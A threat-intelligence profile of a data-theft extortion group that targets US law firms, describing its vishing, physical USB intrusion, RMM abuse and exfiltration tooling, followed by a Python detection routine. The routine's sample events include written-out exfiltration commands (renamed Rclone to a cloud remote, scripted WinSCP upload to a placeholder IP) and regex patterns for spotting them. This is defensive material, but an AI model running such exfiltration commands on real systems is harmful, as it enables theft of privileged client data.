SUBJECT PROFILE
A Russia-linked extortion group that spun off from the Conti post-shutdown ecosystem in 2022 and has now escalated to an unprecedented physical intrusion tactic: sending operatives in person to victim law firm offices, disguised as IT support staff, to insert USB drives and exfiltrate data directly. The FBI issued a FLASH-severity alert (FLASH-20260526-01), the highest-urgency classification, on May 26, 2026, detailing this active Spring 2026 development. SRG deploys no malware or encryption, leaving minimal forensic artifacts and defeating most EDR tooling; more than 38 firms have had data publicly posted, and the total exceeds 100 confirmed incidents.
Financial extortion through pure data theft and threats of public disclosure, with no ransomware encryption deployed; primary focus on attorney-client privileged data at US law firms
OPERATIONAL HISTORY
T1566 Callback Phishing (subscription billing lures); T1598.004 Vishing (IT impersonation over phone); Physical Intrusion (in-person USB/HDD insertion, Spring 2026 escalation); T1219 Remote Desktop Session hijacking (AnyDesk, Zoho Assist, legitimate RMM tools); T1048 Exfiltration via WinSCP / hidden Rclone; T1567 Exfiltration to OneDrive/Google Drive; T1078 Valid Account abuse; T1657 Pure data-theft extortion (no encryption); victim employee/client harassment calls post-exfiltration
KNOWN INFRASTRUCTURE
Public clearnet leak site: business-data-leaks[.]com; lookalike IT helpdesk/support portal domains registered per campaign; WinSCP and Rclone for exfiltration; AnyDesk and Zoho Assist for remote access; physical operatives with removable USB/HDD media (Spring 2026 escalation); no custom malware, entirely living-off-the-land (LOTL) tooling and social engineering
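The detection angle on the tooling listed under OPERATIONAL HISTORY and KNOWN INFRASTRUCTURE (WinSCP, hidden Rclone, AnyDesk, Zoho Assist), as an added example that is not part of this profile: a Python triage routine that flags a renamed Rclone binary by its command line, scripted WinSCP use, and remote-access tools not on an allowlist. The event records, the "Approved RMM" allowlist entry and the regexes are constructed assumptions for illustration, not data from the page.

```python
import re
from typing import Dict, List

# Constructed process-creation events (simplified Sysmon Event ID 1 shape), made up
# for illustration and not taken from any real incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    # Rclone renamed to blend in: the image name is innocuous, the command line is Rclone's.
    {"image": r"C:\Users\Public\svc.exe",
     "cmdline": r'svc.exe copy "C:\Cases" gdrive:backup --config C:\Users\Public\r.conf --transfers 8'},
    # WinSCP driven non-interactively instead of through its GUI.
    {"image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r'WinSCP.exe /command "open sftp://u:p@203.0.113.10/" "put C:\Cases\*" "exit"'},
    {"image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe --install"},
    {"image": r"C:\Program Files\Approved RMM\agent.exe", "cmdline": "agent.exe --service"},
]

# Rclone fingerprints survive a renamed binary: a transfer subcommand plus either a
# "remote:path" destination (two or more letters before the colon, so a drive letter
# such as C:\ does not count) or an Rclone-only flag.
RCLONE_SUBCMD = re.compile(r"\b(copy|copyto|sync|move)\b", re.I)
RCLONE_REMOTE = re.compile(r"(?:^|\s)[A-Za-z][\w-]+:\S*")
RCLONE_FLAGS = ("--config", "--transfers", "--no-check-certificate")
WINSCP_SCRIPTED = re.compile(r"winscp\.exe\s+(/script|/command)\b", re.I)
# Remote-access tools named in the profile; anything not on the allowlist is flagged.
RMM_TOOLS = ("anydesk", "zohoassist", "zoho assist", "zaservice")
APPROVED_RMM = ("approved rmm",)  # hypothetical allowlisted product name


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection tags that apply to one process-creation event."""
    tags: List[str] = []
    image, cmd = event["image"].lower(), event["cmdline"]
    if RCLONE_SUBCMD.search(cmd) and (
        RCLONE_REMOTE.search(cmd) or any(f in cmd for f in RCLONE_FLAGS)
    ):
        tags.append("rclone" if "rclone" in image else "renamed-rclone")
    if WINSCP_SCRIPTED.search(cmd):
        tags.append("winscp-scripted")
    if any(t in image or t in cmd.lower() for t in RMM_TOOLS) and not any(
        a in image for a in APPROVED_RMM
    ):
        tags.append("unapproved-rmm")
    return tags


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Triage a batch of events, keeping only those that tripped at least one tag."""
    return [(e["image"], classify(e)) for e in events if classify(e)]
```

Feed it real Sysmon or EDR process-creation telemetry in place of SAMPLE_EVENTS; the point is that matching on the image name alone misses a renamed Rclone while the command-line shape does not.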